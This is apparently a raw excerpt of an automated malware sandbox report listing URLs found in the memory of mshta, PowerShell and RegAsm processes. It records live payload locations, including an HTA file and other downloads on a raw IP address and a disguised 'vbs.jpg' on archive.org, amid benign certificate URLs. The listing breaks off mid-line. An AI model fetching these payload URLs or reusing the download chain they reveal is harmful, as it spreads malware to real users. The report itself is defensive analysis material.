Source: powershell.exe, 0000000E.00000002.436681548.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000028B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155
Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/
Source: mshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/9VEB
Source: mshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/=VEB
Source: powershell.exe, 0000000E.00000002.436681548.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000028B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/REDS.txt
Source: mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta
Source: mshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta6
Source: mshta.exe, 00000011.00000002.458485189.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta:KWWS
Source: mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaC:
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaEB
Source: mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaFC:
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac;EB
Source: mshta.exe, 00000004.00000003.407059010.0000000003055000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.451499028.0000000003175000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454477370.0000000003175000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htahttp://192.3.193.155/xampp/boz/bz/IEnetwor
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htak
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaq;EB
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htax;EB
Source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/w
Source: powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.472157211.000000001ADDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF
Source: powershell.exe, 00000014.00000002.472157211.000000001ADDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089
Source: powershell.exe, 00000007.00000002.430127425.000000001A765000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089$
Source: powershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFp
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2F1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2F1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A9C2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001AD39000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe | String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 0000000E.00000002.443270991.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: RegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpSf
Source: RegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpjf
Source: powershell.exe, 00000007.00000002.430127425.000000001A6FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.cr
Source: powershell.exe, 00000007.00000002.423275187.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.423275187.0000000002B21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.423275187.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.459682593.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.436681548.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000024E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000E.00000002.436681548.0000000002622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org
                  Source: powershell.exe, 0000000C.00000002.459682593.0000000002753000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240
                  Source: powershell.exe, 0000001B.00000002.477143819.0000000001D34000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001AC98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACB2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B64F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
                  Source: powershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpString 